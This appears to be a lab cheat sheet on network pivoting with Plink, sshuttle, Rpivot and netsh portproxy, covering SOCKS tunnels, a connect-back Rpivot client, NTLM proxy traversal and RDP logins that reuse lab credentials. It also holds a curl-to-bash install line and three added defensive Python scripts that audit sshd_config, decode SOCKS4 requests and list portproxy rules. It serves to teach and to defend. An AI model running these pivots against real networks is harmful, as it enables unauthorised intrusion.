Plink, Sshuttle, Rpivot, and Netsh Unleashed
Plink Pivoting
Verify PuTTY Installation
Checks whether Plink is installed on the Windows attack host so it can be used for SSH-based pivoting.
C:\mrci0x1> dir "C:\Program Files\PuTTY\plink.exe"
Set Up Dynamic Port Forwarding with Plink
Opens an SSH session to the Ubuntu server and starts a local SOCKS proxy on port 9050; traffic sent to that proxy is tunneled through the server.
C:\mrci0x1> plink.exe -ssh -D 9050 ubuntu@10.129.15.50
Establish an RDP Session
Initiates an RDP session to the Windows target, routed through the Plink SOCKS proxy.
C:\mrci0x1> mstsc.exe /v:172.16.5.19
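Plink's -D flag is ordinary SSH dynamic port forwarding, so whether it works against a given server is decided by that server's sshd_config (AllowTcpForwarding, GatewayPorts, PermitTunnel, PermitOpen). The following audit script is an added example, not part of the original page or of PuTTY; it parses an sshd_config and lists the settings that leave the host usable as a forwarding pivot. It assumes the OpenSSH defaults documented in sshd_config(5) (AllowTcpForwarding yes, GatewayPorts no, PermitTunnel no, PermitOpen any) and only evaluates global directives, skipping Match blocks. Note that this check does not cover sshuttle, which runs python on the remote side over the session channel rather than using port forwarding.

```python
# Added example (not from the original page): audit an sshd_config for the
# directives that govern the SSH dynamic forwarding Plink's -D flag relies on.
# Assumes the OpenSSH defaults from sshd_config(5):
#   AllowTcpForwarding yes, GatewayPorts no, PermitTunnel no, PermitOpen any.
from typing import Dict, List

# Values that apply when a directive is absent from the file.
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
    "permitopen": "any",
}


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Return the global (pre-Match) value of each forwarding directive.

    sshd honours the first occurrence of a directive, so later duplicates are
    ignored; anything inside a Match block is skipped because it applies only
    to the matched users/hosts, not globally.
    """
    values = dict(DEFAULTS)
    seen = set()
    in_match = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Directives may be written "Key value" or "Key=value".
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            in_match = True  # everything after this line is conditional
            continue
        if in_match or key not in DEFAULTS or key in seen:
            continue
        seen.add(key)
        values[key] = value.lower()
    return values


def forwarding_findings(text: str) -> List[str]:
    """List the settings that leave SSH usable as a pivot (e.g. plink -D)."""
    v = parse_sshd_config(text)
    findings = []
    if v["allowtcpforwarding"] in ("yes", "all", "local"):
        findings.append("AllowTcpForwarding permits local/dynamic forwarding (-L/-D)")
    if v["allowtcpforwarding"] in ("yes", "all", "remote"):
        findings.append("AllowTcpForwarding permits remote forwarding (-R)")
    if v["gatewayports"] != "no":
        findings.append("GatewayPorts lets remote forwards bind non-loopback addresses")
    if v["permittunnel"] != "no":
        findings.append("PermitTunnel allows tun device forwarding")
    if v["allowtcpforwarding"] != "no" and v["permitopen"] == "any":
        findings.append("PermitOpen is unrestricted; forwards may reach any host:port")
    return findings


# Constructed samples: a stock config (defaults apply) and a hardened one.
WEAK_CONFIG = "# stock file\nPort 22\nPermitRootLogin no\n"
HARDENED_CONFIG = (
    "AllowTcpForwarding no\n"
    "GatewayPorts no\n"
    "PermitTunnel no\n"
    "Match User backup\n"
    "    AllowTcpForwarding local\n"  # per-user exception, not global
)

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, forwarding_findings(cfg) or ["no forwarding exposure"])
```

Run it against /etc/ssh/sshd_config on the pivot candidate; an empty list means that host cannot be used as a plink -D proxy even with valid credentials, although it may still be reachable as an interactive shell.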
Sshuttle Pivoting
Install Sshuttle
Installs Sshuttle on the attack host to enable transparent network pivoting.
C:\mrci0x1> sudo apt-get install sshuttle
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
alsa-tools golang-1.15 golang-1.15-doc golang-1.15-go golang-1.15-src
golang-1.16-src libcmis-0.5-5v5 libct4 libgvm20 liblibreoffice-java
libmotif-common libqrcodegencpp1 libunoloader-java libxm4
linux-headers-5.10.0-6parrot1-common python-babel-localedata
python3-aiofiles python3-babel python3-fastapi python3-pydantic
python3-slowapi python3-starlette python3-uvicorn sqsh ure-java
Use 'sudo apt autoremove' to remove them.
Suggested packages:
autossh
The following NEW packages will be installed:
sshuttle
Configure Sshuttle
Routes traffic for the 172.16.5.0/23 network through the Ubuntu server.
C:\mrci0x1> sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v
Starting sshuttle proxy (version 1.1.0).
c : Starting firewall manager with command: ['/usr/bin/python3', '/usr/local/lib/python3.9/dist-packages/sshuttle/__main__.py', '-v', '--method', 'auto', '--firewall']
fw: Starting firewall with Python version 3.9.2
fw: ready method name nat.
c : IPv6 enabled: Using default IPv6 listen address ::1
c : Method: nat
c : IPv4: on
c : IPv6: on
Scan the Windows Target
Scans the Windows target for RDP service availability through the Sshuttle tunnel.
C:\mrci0x1> nmap -v -sV -p3389 172.16.5.19 -A -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-08 11:16 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:16
Completed NSE at 11:16, 0.00s elapsed
Initiating NSE at 11:16
Completed NSE at 11:16, 0.00s elapsed
Initiating NSE at 11:16
Completed NSE at 11:16, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:16
Completed Parallel DNS resolution of 1 host. at 11:16, 0.15s elapsed
Initiating Connect Scan at 11:16
Scanning 172.16.5.19 [1 port]
Establish an RDP Session
Connects to the Windows target via RDP using the Sshuttle tunnel.
C:\mrci0x1> xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
Rpivot Pivoting
Clone Rpivot
Downloads the Rpivot repository to the attack host for SOCKS proxy pivoting.
C:\mrci0x1> git clone https://github.com/klsecservices/rpivot.git
Install Python 2.7
Installs Python 2.7, which Rpivot requires.
C:\mrci0x1> sudo apt-get install python2.7
Alternative method: install Python 2.7 with pyenv.
C:\mrci0x1> curl https://pyenv.run | bash
C:\mrci0x1> echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
C:\mrci0x1> echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
C:\mrci0x1> echo 'eval "$(pyenv init -)"' >> ~/.bashrc
C:\mrci0x1> source ~/.bashrc
C:\mrci0x1> pyenv install 2.7
C:\mrci0x1> pyenv shell 2.7
Start the Rpivot Server
Runs the Rpivot server on the attack host to listen for client connections.
C:\mrci0x1> cd rpivot
C:\mrci0x1> python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
Transfer Rpivot to the Pivot Host
Copies the Rpivot directory to the Ubuntu server.
C:\mrci0x1> scp -r rpivot ubuntu@10.129.202.64:/home/ubuntu/
Run the Rpivot Client
Starts the Rpivot client on the pivot host to connect back to the attack host.
C:\pivot_host> python2.7 client.py --server-ip 10.10.14.104 --server-port 9999
New connection from host 10.129.202.64, source port 35226
Configure Proxychains
Configures proxychains to route traffic through the Rpivot SOCKS proxy.
C:\mrci0x1> echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf
Access the Web Server
Uses proxychains with Firefox to access the internal web server.
C:\mrci0x1> proxychains firefox-esr 172.16.5.135:80
C:\mrci0x1> proxychains curl http://172.16.5.135:80
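The "socks4 127.0.0.1 9050" line above makes proxychains open each connection by sending a SOCKS4 request to the Rpivot listener. The decoder below is an added example, not part of the page or of Rpivot, showing what that request looks like on the wire and how to recover the destination from it; the sample bytes are constructed from the SOCKS4/4a request layout, not captured from the tool, and the Rpivot client-to-server traffic on port 9999 is a separate protocol not covered here. For a defender, the same check lets a sensor or a socket-level hook recognise SOCKS4 requests arriving at a listener that should not exist and log where they were headed.

```python
# Added example (not from the original page): decode the SOCKS4/SOCKS4a
# request that a SOCKS client such as proxychains sends to a listener.
# Sample bytes are constructed from the request layout, not captured.
import struct
from typing import Any, Dict


def decode_socks4_request(data: bytes) -> Dict[str, Any]:
    """Parse one SOCKS4/4a client request.

    Layout: VN(1)=4, CD(1)=1 CONNECT / 2 BIND, DSTPORT(2, big-endian),
    DSTIP(4), USERID(null-terminated). SOCKS4a signals a hostname by setting
    DSTIP to 0.0.0.x (x != 0) and appending a null-terminated domain name.
    """
    if len(data) < 9:
        raise ValueError("truncated SOCKS4 request")
    vn, cd, port = struct.unpack("!BBH", data[:4])
    if vn != 4:
        raise ValueError(f"not SOCKS4 (version byte {vn})")
    if cd not in (1, 2):
        raise ValueError(f"unknown command {cd}")
    ip = data[4:8]
    end_user = data.find(b"\x00", 8)
    if end_user == -1:
        raise ValueError("USERID not terminated")
    userid = data[8:end_user].decode("ascii", "replace")
    result: Dict[str, Any] = {
        "command": "CONNECT" if cd == 1 else "BIND",
        "port": port,
        "userid": userid,
    }
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:
        # SOCKS4a: the hostname follows the USERID terminator and is
        # resolved by the proxy, so the client never does a DNS lookup.
        end_host = data.find(b"\x00", end_user + 1)
        if end_host == -1:
            raise ValueError("SOCKS4a hostname not terminated")
        result["host"] = data[end_user + 1:end_host].decode("ascii", "replace")
        result["socks4a"] = True
    else:
        result["host"] = ".".join(str(b) for b in ip)
        result["socks4a"] = False
    return result


def is_socks4_request(data: bytes) -> bool:
    """True if the leading bytes of a TCP stream form a valid SOCKS4/4a request."""
    try:
        decode_socks4_request(data)
        return True
    except ValueError:
        return False


def describe_request(data: bytes) -> str:
    """One-line summary suitable for a log entry."""
    r = decode_socks4_request(data)
    suffix = "a" if r["socks4a"] else ""
    return f"SOCKS4{suffix} {r['command']} -> {r['host']}:{r['port']}"


# Constructed sample: a CONNECT to 172.16.5.135:80 with an empty USERID.
SAMPLE_CONNECT = b"\x04\x01\x00\x50" + bytes([172, 16, 5, 135]) + b"\x00"
# Constructed SOCKS4a sample: DSTIP 0.0.0.1, hostname resolved by the proxy.
SAMPLE_CONNECT_4A = b"\x04\x01\x00\x50\x00\x00\x00\x01" + b"\x00" + b"intranet.local\x00"

if __name__ == "__main__":
    for sample in (SAMPLE_CONNECT, SAMPLE_CONNECT_4A):
        print(sample.hex(), "=>", describe_request(sample))
```

The first byte being 0x04 is the cheap filter; the full parse is what confirms a request and yields the destination that proxychains asked the listener to reach.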
Handling NTLM Authentication
Runs the Rpivot client with domain credentials so that its connection back to the attack host can pass through an NTLM-authenticating proxy.
C:\pivot_host> python2.7 client.py --server-ip 10.10.14.104 --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain INLANEFREIGHT --username <username> --password <password>
Netsh Port Forwarding
Configure Port Forwarding with Netsh
Sets up a port forwarding rule on the compromised Windows host to redirect traffic from the external interface to the internal target.
C:\windows> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.19
Verify the Port Forwarding Rule
Checks the configured portproxy settings to confirm the forwarding rule.
C:\windows> netsh.exe interface portproxy show v4tov4
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.15.150   8080        172.16.5.19     3389
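The "show v4tov4" output above is also what an auditor sees when checking a host for forwarding rules. The script below is an added example, not part of the page or of Windows tooling: it parses that text, returns each rule as a record, and describes what the rule exposes. The sample output is constructed to match the page's single rule. Because portproxy rules persist under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, the same parser can be fed output collected remotely and the registry key can be monitored for writes.

```python
# Added example (not from the original page): parse the text printed by
# "netsh interface portproxy show v4tov4" and describe every rule found.
# A portproxy entry on a workstation or member server is rarely legitimate.
# The sample output below is constructed to match the page's rule.
import ipaddress
import re
from typing import Dict, List

# One data row: listen address, listen port, connect address, connect port.
ROW_RE = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_portproxy(text: str) -> List[Dict[str, object]]:
    """Return the v4tov4 rules as dicts; header and separator lines are skipped."""
    rules: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # "Listen on ipv4:", "Address Port ..." and dashed lines
        listen_addr, listen_port, connect_addr, connect_port = m.groups()
        rules.append({
            "listen_address": listen_addr,
            "listen_port": int(listen_port),
            "connect_address": connect_addr,
            "connect_port": int(connect_port),
        })
    return rules


def _is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def describe_rule(rule: Dict[str, object]) -> str:
    """Explain what a rule exposes, in plain words for an alert or a ticket."""
    listen = f"{rule['listen_address']}:{rule['listen_port']}"
    target = f"{rule['connect_address']}:{rule['connect_port']}"
    notes = []
    if str(rule["listen_address"]) in ("0.0.0.0", "*"):
        notes.append("listens on all interfaces")
    connect_addr = str(rule["connect_address"])
    if not _is_ip(connect_addr):
        notes.append("connect address is a hostname (resolved at use time)")
    elif not ipaddress.ip_address(connect_addr).is_loopback:
        notes.append("forwards to a different host")
    if rule["connect_port"] == 3389:
        notes.append("target port is RDP")
    return f"{listen} -> {target}" + (f" ({'; '.join(notes)})" if notes else "")


def audit_portproxy(text: str) -> List[str]:
    """One line per rule found; an empty list means no portproxy rules exist."""
    return [describe_rule(r) for r in parse_portproxy(text)]


# Constructed sample matching the rule shown on the page.
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.15.150   8080        172.16.5.19     3389
"""

if __name__ == "__main__":
    for line in audit_portproxy(SAMPLE_OUTPUT) or ["no portproxy rules"]:
        print(line)
```

On a live host, pipe the output of netsh interface portproxy show v4tov4 into parse_portproxy; any rule that "forwards to a different host" deserves a look, and a rule added by the page's command will show up exactly as the sample does.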
Connect to the Internal Host
Initiates an RDP session from the attack host to the forwarded port on the compromised Windows host.
C:\mrci0x1> xfreerdp /v:10.129.15.150:8080 /u:victor /p:pass@123